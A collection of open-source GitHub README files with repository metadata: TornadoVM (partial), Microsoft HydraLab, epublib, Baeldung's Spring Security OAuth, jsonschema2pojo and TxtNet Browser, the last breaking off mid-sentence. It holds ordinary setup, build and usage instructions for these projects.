in your Projects? To use TornadoVM, you need two components: a) The TornadoVM `jar` file with the API. The API is licensed under Apache 2 (see the Licenses section below). b) The core libraries of TornadoVM along with the dynamic library for the driver code (`.so` files for OpenCL, PTX and/or SPIRV/Level Zero).
You can import the TornadoVM API by adding the following dependency in the Maven `pom.xml` file: ```xml <repositories> <repository> <id>universityOfManchester-graal</id> <url>https://raw.githubusercontent.com/beehive-lab/tornado/maven-tornadovm</url> </repository> </repositories> <dependencies> <dependency> <groupId>tornado</groupId> <artifactId>tornado-api</artifactId> <version>1.0.3</version> </dependency> <dependency> <groupId>tornado</groupId> <artifactId>tornado-matrices</artifactId> <version>1.0.3</version> </dependency> </dependencies> ``` To run TornadoVM, you need to either install the TornadoVM extension for GraalVM/OpenJDK, or run with our Docker [images](https://github.com/beehive-lab/docker-tornado). ## 6. Additional Resources [Here](https://tornadovm.readthedocs.io/en/latest/resources.html) you can find videos, presentations, tech-articles and artefacts describing TornadoVM, and how to use it. ## 7. Academic Publications If you are using **TornadoVM >= 0.2** (which includes the Dynamic Reconfiguration, the initial FPGA support and CPU/GPU reductions), please use the following citation: ```bibtex @inproceedings{Fumero:DARHH:VEE:2019, author = {Fumero, Juan and Papadimitriou, Michail and Zakkak, Foivos S. and Xekalaki, Maria and Clarkson, James and Kotselidis, Christos}, title = {{Dynamic Application Reconfiguration on Heterogeneous Hardware.}}, booktitle = {Proceedings of the 15th ACM SIGPLAN/SIGOPS International Conference on Virtual Execution Environments}, series = {VEE '19}, year = {2019}, doi = {10.1145/3313808.3313819}, publisher = {Association for Computing Machinery} } ``` If you are using **Tornado 0.1** (Initial release), please use the following citation in your work. ```bibtex @inproceedings{Clarkson:2018:EHH:3237009.3237016, author = {Clarkson, James and Fumero, Juan and Papadimitriou, Michail and Zakkak, Foivos S. and Xekalaki, Maria and Kotselidis, Christos and Luj\'{a}n, Mikel}, title = {{Exploiting High-performance Heterogeneous Hardware for Java Programs Using Graal}}, booktitle = {Proceedings of the 15th International Conference on Managed Languages \& Runtimes}, series = {ManLang '18}, year = {2018}, isbn = {978-1-4503-6424-9}, location = {Linz, Austria}, pages = {4:1--4:13}, articleno = {4}, numpages = {13}, url = {http://doi.acm.org/10.1145/3237009.3237016}, doi = {10.1145/3237009.3237016}, acmid = {3237016}, publisher = {ACM}, address = {New York, NY, USA}, keywords = {Java, graal, heterogeneous hardware, openCL, virtual machine}, } ``` Selected publications can be found [here](https://tornadovm.readthedocs.io/en/latest/publications.html). ## 8. Acknowledgments This work is partially funded by [Intel Corporation](https://www.intel.com/content/www/us/en/homepage.html). In addition, it has been supported by the following EU & UKRI grants (most recent first): - EU Horizon Europe & UKRI [AERO 101092850](https://cordis.europa.eu/project/id/101092850). - EU Horizon Europe & UKRI [INCODE 101093069](https://cordis.europa.eu/project/id/101093069). - EU Horizon Europe & UKRI [ENCRYPT 101070670](https://encrypt-project.eu). - EU Horizon Europe & UKRI [TANGO 101070052](https://tango-project.eu). - EU Horizon 2020 [ELEGANT 957286](https://www.elegant-h2020.eu/). - EU Horizon 2020 [E2Data 780245](https://e2data.eu). - EU Horizon 2020 [ACTiCLOUD 732366](https://acticloud.eu). Furthermore, TornadoVM has been supported by the following [EPSRC](https://www.ukri.org/councils/epsrc/) grants: - [PAMELA EP/K008730/1](http://apt.cs.manchester.ac.uk/projects/PAMELA/).
- [AnyScale Apps EP/L000725/1](https://gow.epsrc.ukri.org/NGBOViewGrant.aspx?GrantRef=EP/L000725/1). ## 9. Contributions and Collaborations We welcome collaborations! Please see how to contribute to the project in the [CONTRIBUTING](CONTRIBUTING.md) page. ### Write your questions and proposals: Additionally, you can open new proposals on the GitHub discussions [page](https://github.com/beehive-lab/TornadoVM/discussions). Alternatively, you can share a Google document with us. ### Collaborations: For Academic & Industry collaborations, please contact us [here](https://www.tornadovm.org/contact-us). ## 10. TornadoVM Team Visit our [website](https://tornadovm.org) to meet the [team](https://www.tornadovm.org/about-us). ## 11. Licenses To use TornadoVM, you can link the TornadoVM API to your application; the API is licensed under Apache 2. Each Java TornadoVM module is licensed as follows: | Module | License | |--------------------------------|---------------------------------------------------------------------------------------------------------------------------------------------------------------| | Tornado-API | [![License: Apache 2](https://img.shields.io/badge/License-Apache%202.0-red.svg)](https://github.com/beehive-lab/TornadoVM/blob/master/LICENSE_APACHE2) | | Tornado-Runtime | [![License: GPL v2](https://img.shields.io/badge/License-GPL%20v2-blue.svg)](https://www.gnu.org/licenses/old-licenses/gpl-2.0.en.html) + CLASSPATH Exception | | Tornado-Assembly | [![License: Apache 2](https://img.shields.io/badge/License-Apache%202.0-red.svg)](https://github.com/beehive-lab/TornadoVM/blob/master/LICENSE_APACHE2) | | Tornado-Drivers | [![License: GPL v2](https://img.shields.io/badge/License-GPL%20v2-blue.svg)](https://www.gnu.org/licenses/old-licenses/gpl-2.0.en.html) + CLASSPATH Exception | | Tornado-Drivers-OpenCL-Headers | [![License](https://img.shields.io/badge/License-Apache%202.0-red.svg)](https://github.com/KhronosGroup/OpenCL-Headers/blob/master/LICENSE) | | Tornado-scripts | [![License: Apache 2](https://img.shields.io/badge/License-Apache%202.0-red.svg)](https://github.com/beehive-lab/TornadoVM/blob/master/LICENSE_APACHE2) | | Tornado-Annotation | [![License: Apache 2](https://img.shields.io/badge/License-Apache%202.0-red.svg)](https://github.com/beehive-lab/TornadoVM/blob/master/LICENSE_APACHE2) | | Tornado-Unittests | [![License: Apache 2](https://img.shields.io/badge/License-Apache%202.0-red.svg)](https://github.com/beehive-lab/TornadoVM/blob/master/LICENSE_APACHE2) | | Tornado-Benchmarks | [![License: Apache 2](https://img.shields.io/badge/License-Apache%202.0-red.svg)](https://github.com/beehive-lab/TornadoVM/blob/master/LICENSE_APACHE2) | | Tornado-Examples | [![License: Apache 2](https://img.shields.io/badge/License-Apache%202.0-red.svg)](https://github.com/beehive-lab/TornadoVM/blob/master/LICENSE_APACHE2) | | Tornado-Matrices | [![License: Apache 2](https://img.shields.io/badge/License-Apache%202.0-red.svg)](https://github.com/beehive-lab/TornadoVM/blob/master/LICENSE_APACHE2) |
0
microsoft/HydraLab
Intelligent cloud testing made easy.
azure chatgpt cloud-testing cross-platform developer-tools device-farm e2e-testing mobile-development performance-testing platform-engineering spring-boot test-automation testgpt testing testing-framework ui-testing
<h1 align="center">Hydra Lab</h1> <p align="center">Build your own cloud testing infrastructure</p> <div align="center"> [中文(完善中)](README.zh-CN.md) [![Build Status](https://dlwteam.visualstudio.com/Next/_apis/build/status/HydraLab-CI?branchName=main)](https://dlwteam.visualstudio.com/Next/_build/latest?definitionId=743&branchName=main) ![Spring Boot](https://img.shields.io/badge/Spring%20Boot-v2.2.5-blue) ![Appium](https://img.shields.io/badge/Appium-v8.0.0-yellow) ![License](https://img.shields.io/badge/license-MIT-green) --- https://github.com/microsoft/HydraLab/assets/8344245/cefefe24-4e11-4cc7-a3af-70cb44974735 [What is Hydra Lab?](#what-is) | [Get Started](#get-started) | [Contribute](#contribute) | [Contact Us](#contact) | [Wiki](https://github.com/microsoft/HydraLab/wiki) </div> <span id="what-is"></span> ## What is Hydra Lab? As mentioned in the above video, Hydra Lab is a framework that can help you easily build a cloud-testing platform utilizing the test devices/machines at hand. Capabilities of Hydra Lab include: - Scalable test device management under the center-agent distributed design; Test task management and test result visualization. - Powering [Android Espresso Test](https://developer.android.com/training/testing/espresso) and Appium (Java) tests on different platforms: Windows/iOS/Android/Browser/Cross-platform. - Case-free test automation: Monkey test, Smart exploratory test. For more details, you may refer to: - [Introduction: What is Hydra Lab?](https://github.com/microsoft/HydraLab/wiki) - [How Hydra Lab Empowers Microsoft Mobile Testing and Test Intelligence](https://medium.com/microsoft-mobile-engineering/how-hydra-lab-empowers-microsoft-mobile-testing-e4bd831ecf41) <span id="get-started"></span> ## Get Started Please visit our **[GitHub Project Wiki](https://github.com/microsoft/HydraLab/wiki)** to understand the dev environment setup procedure: [Contribution Guideline](CONTRIBUTING.md). **Supported environments for Hydra Lab agent**: Windows, Mac OSX, and Linux ([Docker](https://github.com/microsoft/HydraLab/blob/main/agent/README.md#run-agent-in-docker)). **Supported platforms and frameworks matrix**: | | Appium(Java) | Espresso | XCTest | Maestro | Python Runner | | ---- |--------------|---- | ---- | ---- | --- | |Android| &#10004; | &#10004; | x | &#10004; | &#10004; | |iOS| &#10004; | x | &#10004; | &#10004; | &#10004; | |Windows| &#10004; | x | x | x | &#10004; | |Web (Browser)| &#10004; | x | x | x | &#10004; | <span id="quick-start"></span> ### Quick guide to the out-of-the-box Uber Docker image Hydra Lab offers an out-of-the-box Docker image, which we call `Uber`. You can follow the steps below to start your Docker container with both a center instance and an agent instance: **Step 1. Download and install [Docker](https://www.docker.com)** **Step 2. Download the latest Uber Docker image** ```bash docker pull ghcr.io/microsoft/hydra-lab-uber:latest ``` **This step is necessary.** If you skip it and jump to step 3, you may end up running a stale locally cached Docker image with the `latest` tag, if one exists.
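If you are unsure what is cached locally, you can check before running (standard Docker CLI; a quick sanity check rather than an official setup step):

```bash
# List locally cached copies of the Uber image and their tags
docker images ghcr.io/microsoft/hydra-lab-uber
```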
**Step 3. Run on your machine** By default, Hydra Lab will use the local file system as a storage solution, and you may type the following in your terminal to run it: ```bash docker run -p 9886:9886 --name=hydra-lab ghcr.io/microsoft/hydra-lab-uber:latest ``` > We strongly recommend using the [Azure Blob Storage](https://azure.microsoft.com/en-us/products/storage/blobs/) service as the file storage solution, and Hydra Lab has native, consistent, and validated support for it. **Step 4. Visit the web page and view your connected devices** > URL: http://localhost:9886/portal/index.html#/ (or your custom port). Enjoy starting your journey of exploration! **Step 5. Perform the test procedure with a minimal setup** Note: For Android, the Uber image only supports **Espresso/Instrumentation** tests. See the "User Manual" section on this page for more features: [Hydra Lab Wikis](https://github.com/microsoft/HydraLab/wiki). **To run a test with the Uber image and local storage:** - On the front-end page, go to the `Runner` tab and select `HydraLab Client`. - Click `Run` and change "Espresso test scope" to `Test app`, click `Next`. - Pick an available device, click `Next` again, and click `Run` to start the test. - When the test is finished, you can view the test result in the `Task` tab on the left navigator of the front-end page. ![Test trigger steps](docs/images/test-trigger-steps.png) ### Build and run Hydra Lab from the source You can also run the center Java Spring Boot service (a runnable Jar) separately with the following commands: > The build and run process requires JDK11 | NPM | Android SDK platform-tools to be in place. **Step 1. Run the Hydra Lab center service** ```bash # In the project root, switch to the react folder to build the Web front. cd react npm ci npm run pub # Get back to the project root, and build the center runnable Jar. cd .. # For the gradlew command: on Linux/macOS use `./gradlew`, on Windows use `gradlew.bat` gradlew :center:bootJar # Run it, and then visit http://localhost:9886/portal/index.html#/ java -jar center/build/libs/center.jar # Then visit http://localhost:9886/portal/index.html#/auth to generate a new agent ID and agent secret. ``` > If you encounter the error: `Error: error:0308010C:digital envelope routines::unsupported`, set the System Variable `NODE_OPTIONS` as `--openssl-legacy-provider` and then restart the terminal. **Step 2. Run the Hydra Lab agent service** ```bash # In the project root cd android_client # Build the Android client APK ./gradlew assembleDebug cp app/build/outputs/apk/debug/app-debug.apk ../common/src/main/resources/record_release.apk # If you don't have the Android SDK, you can download the prebuilt APK from https://github.com/microsoft/HydraLab/releases # Back to the project root cd .. # In the project root, copy the sample config file and update the: # YOUR_AGENT_NAME, YOUR_REGISTERED_AGENT_ID and YOUR_REGISTERED_AGENT_SECRET. cp agent/application-sample.yml application.yml # Then build an agent jar and run it gradlew :agent:bootJar java -jar agent/build/libs/agent.jar ``` **Step 3. 
Visit http://localhost:9886/portal/index.html#/ and view your connected devices** ### More integration guidelines: - [Test agent setup](https://github.com/microsoft/HydraLab/wiki/Test-agent-setup) - [Trigger a test task run in the Hydra Lab test service](https://github.com/microsoft/HydraLab/wiki/Trigger-a-test-task-run-in-the-Hydra-Lab-test-service) - [Deploy Center Docker Container](https://github.com/microsoft/HydraLab/wiki/Deploy-Center-Docker-Container) <span id="contribute"></span> ## Contribute Your contribution to Hydra Lab will make a difference for the entire test automation ecosystem. Please refer to **[CONTRIBUTING.md](CONTRIBUTING.md)** for instructions. ### Contributor Hero Wall: <a href="https://github.com/Microsoft/hydralab/graphs/contributors"> <img src="https://contrib.rocks/image?repo=Microsoft/hydralab" /> </a> <span id="contact"></span> ## Contact Us You can reach us by [opening an issue](https://github.com/microsoft/HydraLab/issues/new) or [sending us an email](mailto:hydra_lab_support@microsoft.com). <span id="ms-give"></span> ## Microsoft Give Sponsors Thank you for your contribution to the [Microsoft employee giving program](https://aka.ms/msgive) in the name of Hydra Lab: [@Germey(崔庆才)](https://github.com/Germey), [@SpongeOnline(王创)](https://github.com/SpongeOnline), [@ellie-mac(陈佳佩)](https://github.com/ellie-mac), [@Yawn(刘俊钦)](https://github.com/Aqinqin48), [@White(刘子凡)](https://github.com/jkfhklh), [@597(姜志鹏)](https://github.com/JZP1996), [@HCG(尹照宇)](https://github.com/mahoshojoHCG) <span id="license-trademarks"></span> ## License & Trademarks The entire codebase is under [MIT license](https://github.com/microsoft/HydraLab/blob/main/LICENSE). This project may contain trademarks or logos for projects, products, or services. Authorized use of Microsoft trademarks or logos is subject to and must follow [Microsoft’s Trademark & Brand Guidelines](https://www.microsoft.com/en-us/legal/intellectualproperty/trademarks/usage/general). Use of Microsoft trademarks or logos in modified versions of this project must not cause confusion or imply Microsoft sponsorship. Any use of third-party trademarks or logos is subject to those third parties’ policies. We use the Microsoft Clarity analytics platform for the front-end client data dashboard; please refer to [Clarity Overview](https://learn.microsoft.com/en-us/clarity/setup-and-installation/about-clarity) and https://clarity.microsoft.com/ to learn more. Instructions to turn off Clarity: open [MainActivity](https://github.com/microsoft/HydraLab/blob/main/android_client/app/src/main/java/com/microsoft/hydralab/android/client/MainActivity.java), comment out the line that calls initClarity(), rebuild the Hydra Lab Client apk, and replace the one in the agent resources folder. [Telemetry/data collection notice](https://docs.opensource.microsoft.com/releasing/general-guidance/telemetry)
0
psiegman/epublib
a java library for reading and writing epub files
null
# epublib Epublib is a Java library for reading/writing/manipulating epub files. It consists of 2 parts: a core that reads/writes epub and a collection of tools. The tools contain an epub cleanup tool, a tool to create epubs from html files, and a tool to create an epub from an uncompressed html file. It also contains a Swing-based epub viewer. ![Epublib viewer](http://www.siegmann.nl/wp-content/uploads/Alice%E2%80%99s-Adventures-in-Wonderland_2011-01-30_18-17-30.png) The core runs on both Android and a standard Java environment. The tools run only on a standard Java environment. This means that reading/writing epub files works on Android. ## Build status * Travis Build Status: [![Build Status](https://travis-ci.org/psiegman/epublib.svg?branch=master)](https://travis-ci.org/psiegman/epublib) ## Command line examples Set the author of an existing epub java -jar epublib-3.0-SNAPSHOT.one-jar.jar --in input.epub --out result.epub --author Tester,Joe Set the cover image of an existing epub java -jar epublib-3.0-SNAPSHOT.one-jar.jar --in input.epub --out result.epub --cover-image my_cover.jpg ## Creating an epub programmatically package nl.siegmann.epublib.examples; import java.io.InputStream; import java.io.FileOutputStream; import nl.siegmann.epublib.domain.Author; import nl.siegmann.epublib.domain.Book; import nl.siegmann.epublib.domain.Metadata; import nl.siegmann.epublib.domain.Resource; import nl.siegmann.epublib.domain.TOCReference; import nl.siegmann.epublib.epub.EpubWriter; public class Translator { private static InputStream getResource( String path ) { return Translator.class.getResourceAsStream( path ); } private static Resource getResource( String path, String href ) { return new Resource( getResource( path ), href ); } public static void main(String[] args) { try { // Create new Book Book book = new Book(); Metadata metadata = book.getMetadata(); // Set the title metadata.addTitle("Epublib test book 1"); // Add an Author metadata.addAuthor(new Author("Joe", "Tester")); // Set cover image book.setCoverImage( getResource("/book1/test_cover.png", "cover.png") ); // Add Chapter 1 book.addSection("Introduction", getResource("/book1/chapter1.html", "chapter1.html") ); // Add css file book.getResources().add( getResource("/book1/book1.css", "book1.css") ); // Add Chapter 2 TOCReference chapter2 = book.addSection( "Second Chapter", getResource("/book1/chapter2.html", "chapter2.html") ); // Add image used by Chapter 2 book.getResources().add( getResource("/book1/flowers_320x240.jpg", "flowers.jpg")); // Add Chapter2, Section 1 book.addSection(chapter2, "Chapter 2, section 1", getResource("/book1/chapter2_1.html", "chapter2_1.html")); // Add Chapter 3 book.addSection("Conclusion", getResource("/book1/chapter3.html", "chapter3.html")); // Create EpubWriter EpubWriter epubWriter = new EpubWriter(); // Write the Book as Epub epubWriter.write(book, new FileOutputStream("test1_book1.epub")); } catch (Exception e) { e.printStackTrace(); } } } ## Usage in Android Add the following lines to your `app` module's `build.gradle` file: repositories { maven { url 'https://github.com/psiegman/mvn-repo/raw/master/releases' } } dependencies { implementation('nl.siegmann.epublib:epublib-core:4.0') { exclude group: 'org.slf4j' exclude group: 'xmlpull' } implementation 'org.slf4j:slf4j-android:1.7.25' }
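## Reading an epub programmatically

Reading works the same way in reverse; below is a minimal sketch using the `EpubReader` class from epublib-core (the file name reuses the book created in the example above):

    package nl.siegmann.epublib.examples;

    import java.io.FileInputStream;
    import java.io.InputStream;

    import nl.siegmann.epublib.domain.Book;
    import nl.siegmann.epublib.epub.EpubReader;

    public class Reader {
        public static void main(String[] args) {
            try {
                // Open the epub created in the writing example above
                InputStream in = new FileInputStream("test1_book1.epub");

                // Parse the stream into a Book object
                Book book = new EpubReader().readEpub(in);

                // Print the title and the authors from the metadata
                System.out.println(book.getTitle());
                System.out.println(book.getMetadata().getAuthors());
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
    }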
0
Baeldung/spring-security-oauth
Just Announced - Learn Spring Security OAuth
oauth spring-security spring-security-oauth
## Spring Security OAuth I've just announced a new course, dedicated to exploring the new OAuth2 stack in Spring Security 5 - Learn Spring Security OAuth: http://bit.ly/github-lsso </br></br></br> ## Build the Project ``` mvn clean install ``` ## Projects/Modules This project contains a number of modules; here is a quick description of what each module contains: - `oauth-rest` - Authorization Server (Keycloak), Resource Server and Angular App based on the new Spring Security 5 stack - `oauth-jwt` - Authorization Server (Keycloak), Resource Server and Angular App based on the new Spring Security 5 stack, focused on JWT support - `oauth-jws-jwk-legacy` - Authorization Server and Resource Server for JWS + JWK in a Spring Security OAuth2 Application - `oauth-legacy` - Authorization Server, Resource Server, Angular and AngularJS Apps for legacy Spring Security OAuth2 ## Run the Modules You can run any sub-module using the command line: ``` mvn spring-boot:run ``` If you're using Spring STS, you can also import them and run them directly via the Boot Dashboard. You can then access the UI application - for example the module using the Password Grant - like this: `http://localhost:8084/` You can log in using these credentials: username `john` and password `123`. ## Run the Angular 7 Modules - To run any of the Angular 7 front-end modules (_spring-security-oauth-ui-implicit-angular_, _spring-security-oauth-ui-password-angular_ and _oauth-ui-authorization-code-angular_), we need to build the app first: ``` mvn clean install ``` - Then we need to navigate to our Angular app directory: ``` cd src/main/resources ``` And run the command to download the dependencies: ``` npm install ``` - Finally, we will start our app: ``` npm start ``` - Note: Angular 7 modules are commented out because they don't build on Jenkins (they need npm installed), but they build properly locally - Note for Angular versions < 4.3.0: you should comment out the HttpClient and HttpClientModule imports in app.module and app.service.ts. These versions rely on the HttpModule. ## Using the JS-only SPA OAuth Client The main purpose of these projects is to analyze how OAuth should be carried out on JavaScript-only Single-Page Applications, using the authorization_code flow with PKCE. The *clients-SPA-legacy/clients-js-only-react-legacy* project includes a very simple Spring Boot Application serving a couple of separate Single-Page Applications developed in React. It includes the following pages: * a 'Step-By-Step' guide, where we analyze explicitly each step that we need to carry out to obtain an access token and request a secured resource * a 'Real Case' scenario, where we can log in, and obtain or use secured endpoints (provided by the Auth server and by a Custom server we set up) * the Article's Example Page, with the exact same code that is shown in the related article The Step-By-Step guide supports using different providers (Authorization Servers) by just adding (or uncommenting) the corresponding entries in the static/*spa*/js/configs.js. ### The 'Step-by-Step' OAuth Client with PKCE page After running the Spring Boot Application (a simple *mvn spring-boot:run* command will be enough), we can browse to *http://localhost:8080/pkce-stepbystep/index.html* and follow the steps to find out what it takes to obtain an access token using the Authorization Code with PKCE Flow. When prompted with the login form, we might need to create a user for our application first.
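The Step-By-Step page generates the PKCE values in the browser; the same derivation can be reproduced in plain Java (a minimal sketch of RFC 7636's `S256` method, shown here for illustration - this class is not part of the repository):

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.SecureRandom;
import java.util.Base64;

public class PkceSketch {
    public static void main(String[] args) throws Exception {
        // code_verifier: 32 random bytes, base64url-encoded without padding (RFC 7636)
        byte[] random = new byte[32];
        new SecureRandom().nextBytes(random);
        String codeVerifier = Base64.getUrlEncoder().withoutPadding().encodeToString(random);

        // code_challenge = BASE64URL(SHA-256(ASCII(code_verifier)))
        byte[] digest = MessageDigest.getInstance("SHA-256")
                .digest(codeVerifier.getBytes(StandardCharsets.US_ASCII));
        String codeChallenge = Base64.getUrlEncoder().withoutPadding().encodeToString(digest);

        System.out.println("code_verifier:  " + codeVerifier);
        System.out.println("code_challenge: " + codeChallenge);
    }
}
```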
### The 'Real-Case' OAuth Client with PKCE page To use all the features contained in the *http://localhost:8080/pkce-realcase/index.html* page, we'll need to first start the resource server (clients-SPA-legacy/oauth-resource-server-auth0-legacy). In this page, we can: * List the resources in our resource server (public, no permissions needed) * Add resources (we're asked for the permissions to do that when logging in; for simplicity's sake, we just request the existing 'profile' scope) * Remove resources (we actually can't accomplish this task, because the resource server requires the application to have permissions that were not included in the existing scopes)
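For reference, the token request that concludes the flow on both pages is the standard authorization-code + PKCE exchange; roughly (a sketch - the token endpoint path, client id and redirect URI are placeholders that vary per authorization server):

```
curl -X POST 'https://YOUR_AUTH_SERVER/oauth/token' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -d 'grant_type=authorization_code' \
  -d 'client_id=YOUR_CLIENT_ID' \
  -d 'code=AUTHORIZATION_CODE_FROM_REDIRECT' \
  -d 'redirect_uri=http://localhost:8080/pkce-realcase/index.html' \
  -d 'code_verifier=CODE_VERIFIER_FROM_STEP_1'
```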
0
joelittlejohn/jsonschema2pojo
Generate Java types from JSON or JSON Schema and annotate those types for data-binding with Jackson, Gson, etc
ant-task gradle-plugin gson jackson java json json-schema maven-plugin
# jsonschema2pojo [![Build Status](https://github.com/joelittlejohn/jsonschema2pojo/actions/workflows/ci.yml/badge.svg?query=branch%3Amaster)](https://github.com/joelittlejohn/jsonschema2pojo/actions/workflows/ci.yml?query=branch%3Amaster) [![Maven Central](https://maven-badges.herokuapp.com/maven-central/org.jsonschema2pojo/jsonschema2pojo/badge.svg)](http://search.maven.org/#search%7Cga%7C1%7Cg%3A%22org.jsonschema2pojo%22) _jsonschema2pojo_ generates Java types from JSON Schema (or example JSON) and can annotate those types for data-binding with Jackson 2.x or Gson. ### [Try jsonschema2pojo online](http://jsonschema2pojo.org/)<br>or `brew install jsonschema2pojo` You can use jsonschema2pojo as a Maven plugin, an Ant task, a command line utility, a Gradle plugin or embedded within your own Java app. The [Getting Started](https://github.com/joelittlejohn/jsonschema2pojo/wiki/Getting-Started) guide will show you how. A very simple Maven example: ```xml <plugin> <groupId>org.jsonschema2pojo</groupId> <artifactId>jsonschema2pojo-maven-plugin</artifactId> <version>1.2.1</version> <configuration> <sourceDirectory>${basedir}/src/main/resources/schema</sourceDirectory> <targetPackage>com.example.types</targetPackage> </configuration> <executions> <execution> <goals> <goal>generate</goal> </goals> </execution> </executions> </plugin> ``` A very simple Gradle example: ```groovy plugins { id "java" id "org.jsonschema2pojo" version "1.2.1" } repositories { mavenCentral() } dependencies { implementation 'com.fasterxml.jackson.core:jackson-databind:2.15.2' } jsonSchema2Pojo { targetPackage = 'com.example' } ``` Useful pages: * **[Getting started](https://github.com/joelittlejohn/jsonschema2pojo/wiki/Getting-Started)** * **[How to contribute](https://github.com/joelittlejohn/jsonschema2pojo/blob/master/CONTRIBUTING.md)** * [Reference](https://github.com/joelittlejohn/jsonschema2pojo/wiki/Reference) * [Latest Javadocs](https://joelittlejohn.github.io/jsonschema2pojo/javadocs/1.2.1/) * [Documentation for the Maven plugin](https://joelittlejohn.github.io/jsonschema2pojo/site/1.2.1/generate-mojo.html) * [Documentation for the Gradle plugin](https://github.com/joelittlejohn/jsonschema2pojo/tree/master/jsonschema2pojo-gradle-plugin#usage) * [Documentation for the Ant task](https://joelittlejohn.github.io/jsonschema2pojo/site/1.2.1/Jsonschema2PojoTask.html) Project resources: * [Downloads](https://github.com/joelittlejohn/jsonschema2pojo/releases) * [Mailing list](https://groups.google.com/forum/#!forum/jsonschema2pojo-users) Special thanks: * unkish * Thach Hoang * Dan Cruver * Ben Manes * Sam Duke * Duane Zamrok * Christian Trimble * YourKit, who support this project through a free license for the [YourKit Java Profiler](https://www.yourkit.com/java/profiler). Licensed under the [Apache License, Version 2.0](http://www.apache.org/licenses/LICENSE-2.0).
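As noted above, jsonschema2pojo can also be embedded within your own Java app. A very simple embedded example (a sketch assuming the `SchemaMapper` API from `jsonschema2pojo-core`; the schema path, class name and package are illustrative):

```java
import java.io.File;
import java.net.URL;

import org.jsonschema2pojo.DefaultGenerationConfig;
import org.jsonschema2pojo.GenerationConfig;
import org.jsonschema2pojo.Jackson2Annotator;
import org.jsonschema2pojo.SchemaGenerator;
import org.jsonschema2pojo.SchemaMapper;
import org.jsonschema2pojo.SchemaStore;
import org.jsonschema2pojo.rules.RuleFactory;

import com.sun.codemodel.JCodeModel;

public class GenerateTypes {

    public static void main(String[] args) throws Exception {
        // The code model that generated classes are written into
        JCodeModel codeModel = new JCodeModel();

        // An example schema on the local file system (illustrative path)
        URL source = new File("src/main/resources/schema/person.json").toURI().toURL();

        // Start from the default configuration, overriding options as needed
        GenerationConfig config = new DefaultGenerationConfig() {
            @Override
            public boolean isGenerateBuilders() {
                return true;
            }
        };

        // Map the schema to Java types and write the sources out
        SchemaMapper mapper = new SchemaMapper(
                new RuleFactory(config, new Jackson2Annotator(config), new SchemaStore()),
                new SchemaGenerator());
        mapper.generate(codeModel, "Person", "com.example.types", source);

        codeModel.build(new File("target/generated-sources"));
    }
}
```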
0
lukeaschenbrenner/TxtNet-Browser
An app that lets you browse the web over SMS
null
# TxtNet Browser ### Browse the Web over SMS, no WiFi or Mobile Data required! <p align="center"><img src="https://github.com/lukeaschenbrenner/TxtNet-Browser/raw/master/app/src/main/ic_launcher-playstore.png" alt="App Icon" width="200"/></p> > **⏸️ Development of this project is currently on hiatus due to other ongoing commitments. However, fixes and improvements are planned when development continues in Q1 2024! ⏸️** TxtNet Browser is an Android app that allows anyone around the world to browse the web without a mobile data connection! It uses SMS as a medium for transmitting HTTP requests to a server, where a pre-parsed HTML response is compressed using Google's [Brotli](https://github.com/google/brotli) compression algorithm and encoded using a custom Base-114 encoding format (based on [Basest](https://github.com/saxbophone/basest-python)). In addition, any user can act as a server using their own phone's primary phone number and a Wi-Fi/data connection at the press of a button, allowing for peer-to-peer distributed networks. ## Download ### See the **[releases page](https://github.com/lukeaschenbrenner/TxtNet-Browser/releases)** for an APK download of the TxtNet Browser client. A Google Play release is coming soon. TxtNet Browser is currently compatible with Android 4.4-13+. ## Running Server Instances (uptime not guaranteed) | Country | Phone Number | Notes | | :--- | :----: | :--- | | United States | +1(913)203-2719 | Supports SMS to all +1 (US/Canada) numbers in addition to [these countries](https://github.com/lukeaschenbrenner/TxtNet-Browser/issues/2#issuecomment-1510506701) | | | | | Let me know if you are interested in hosting a server instance for your area! > ⚠️**Please note**: All web traffic should be considered unencrypted, as all requests are made over SMS and received in plaintext by the server! ## How it works (client) This app uses a permission that allows a broadcast receiver to receive and parse incoming SMS messages without the need for the app to be registered as the user's default messaging app. While granting an app SMS permissions poses a security concern, the code for this app is open source, and all code involving the use of internet permissions is compartmentalized in the server module. This ensures that unless the app is set up to be a server, no internet traffic is transmitted. In addition, as the client, SMS messages are only programmatically sent to and received from a registered server phone number. The app communicates with a "server phone number", which is a phone number controlled by a "server host" that communicates directly over SMS using Android's SMS APIs. Each URL request is sent, encoded in a custom base 114, to the server. Usually, this only requires 1 SMS, but just in case, each message is prepended with an order specifier. When the server receives a request, the server uses an Android WebView component to programmatically request the website in a manner that simulates a regular request, to avoid restrictions some services (such as Cloudflare) place on HTTP clients. By doing this, any JavaScript can also execute on the website, allowing content to be dynamically loaded into the HTML if needed. Once the page is loaded, only the HTML is transferred back to the recipient device. The HTML is stripped of unnecessary tags and attributes, compressed into raw bytes, and then encoded.
Once encoded, the messages are split into 160-character numbered segments (maximizing the [GSM-7 standard](https://en.wikipedia.org/wiki/GSM_03.38) SMS size) and sent to the client app for parsing and displaying. Side note: Compression savings have been estimated to be an average of 20% using Brotli, but oftentimes it can save much more! For example, the website `example.com` in stripped HTML is 285 characters, but only requires 2 SMS messages (189 characters) to receive. Even including the 225% overhead in data transmission, it is still more efficient! #### Why encode the HTML in the first place? SMS was created in 1984 to utilize the extra bytes from the data channels in phone signalling. It was originally conceived to only support 128 characters in a 7-bit alphabet. When further characters were required to support a subset of the UTF-8 character set, a new standard called UCS-2 was created. Still limited by the 160 bytes available, UCS-2 supports more characters (many of which show up in HTML documents) but limits SMS sizes to 70 characters per SMS. By encoding all data in GSM-7, more data can be sent per SMS message than by sending the raw HTML over SMS. It is possible that it may be even more efficient to create an encoding system using all the characters available in UCS-2, but this limits compatibility and is out of the scope of the project. ## Server Hosting TxtNet Browser has been rewritten to include a built-in server hosting option inside the app. Instead of the now-deprecated Python server using a paid SMS API, any user can now act as a server host, allowing for distributed communication. To enable the background service, tap on the overflow menu and select "TxtNet Server Hosting". Once the necessary permissions are granted, you can press on the "Start Service" toggle to initialize a background service. TxtNet Server uses your primary mobile number associated with the active carrier subscription SIM as a number that others can add and connect to. Please note that this feature is still in early stages of development and likely has many issues. Please submit issue reports for any problems you encounter. For Android 4.4-6.0, you will need to run adb commands one time as specified in the app. For Android 6.0-10.0, you may also use Shizuku, but a PC will still be required once. For Android 11+, no PC is required to activate the server using [Shizuku](https://shizuku.rikka.app/guide/setup/). ##### Desktop Server Installation (Deprecated) <strike> The current source code is pointed at my own server, using a Twilio API with credits I have purchased. If you would like to run your 